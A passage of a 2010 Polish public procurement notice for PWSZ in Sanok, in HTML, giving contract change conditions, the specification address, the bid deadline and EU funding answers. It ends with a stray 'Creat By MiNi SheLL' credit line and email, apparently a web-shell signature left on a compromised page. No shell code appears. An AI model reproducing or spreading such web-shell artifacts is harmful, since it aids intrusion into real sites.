b)powstania nadzwyczajnych okoliczności ( nie będących siłą wyższą ), grożące rażącą stratą, których strony nie przewidziały przy zawarciu umowy.
c)ostateczny zakres prac projektowych zostanie określony po przeprowadzeniu konsultacji z wybranym Wykonawcą. Jeżeli w jakiejś części przedmiot umowy nie będzie możliwy do wykonania z przyczyn obiektywnych ( np. technicznych,  finansowych itp.)  umowa w tym zakresie może ulec zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz-sanok.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PWSZ im. Jana Grodka w Sanoku ul. Mickiewicza 21, 38-500 Sanok, pokój 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2010 godzina 10:00, miejsce: PWSZ im. Jana Grodka w Sanoku ul. Mickiewicza 21, 38-500 Sanok, pokój 202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com